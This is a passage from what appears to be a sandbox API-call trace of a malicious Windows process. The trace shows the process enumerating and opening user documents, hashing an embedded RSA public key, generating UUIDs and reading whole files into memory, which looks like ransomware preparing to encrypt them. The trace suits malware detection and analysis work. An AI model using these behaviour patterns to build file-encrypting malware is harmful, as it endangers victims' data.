(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0192.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.585] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7c62c90, ftCreationTime.dwHighDateTime=0x1d89a59, ftLastAccessTime.dwLowDateTime=0x4544e880, ftLastAccessTime.dwHighDateTime=0x1d89f7a, ftLastWriteTime.dwLowDateTime=0x4544e880, ftLastWriteTime.dwHighDateTime=0x1d89f7a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="noOiZR", cAlternateFileName="")) returned 1 [0192.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0192.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0192.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0192.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed98 [0192.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0192.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea9a8 | out: hHeap=0x6a0000) returned 1 [0192.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0192.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0192.589] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe21177d0, ftCreationTime.dwHighDateTime=0x1d89d5b, ftLastAccessTime.dwLowDateTime=0x5bde4d0, ftLastAccessTime.dwHighDateTime=0x1d8a6fc, ftLastWriteTime.dwLowDateTime=0x5bde4d0, ftLastWriteTime.dwHighDateTime=0x1d8a6fc, nFileSizeHigh=0x0, nFileSizeLow=0x61b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wzwkC7.odp", cAlternateFileName="")) returned 1 [0192.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x751d68 [0192.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.589] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\wzwkC7.odp") returned=".odp" [0192.590] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\wzwkC7.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\wzwkc7.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.594] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=25008) returned 1 [0192.594] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.598] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x618a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.598] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.601] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.601] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x61b0, lpOverlapped=0x0) returned 1 [0192.602] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.602] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.602] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.602] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0192.603] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.603] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.603] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.604] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.604] GetLastError () returned 0x0 [0192.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.604] GetLastError () returned 0x0 [0192.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.604] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.604] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0192.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.605] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.605] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.605] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x61b0) returned 0x2d45778 [0192.605] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41ba8 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41bf0 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.606] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0192.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d90 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39d78 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0192.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.610] GetCurrentThreadId () returned 0x264 [0192.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45320 [0192.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.611] GetCurrentThreadId () returned 0x264 [0192.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d90 [0192.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39df0 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e08 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39da8 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d78 [0192.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41bf0 | out: hHeap=0x6a0000) returned 1 [0192.622] HeapFree (in: 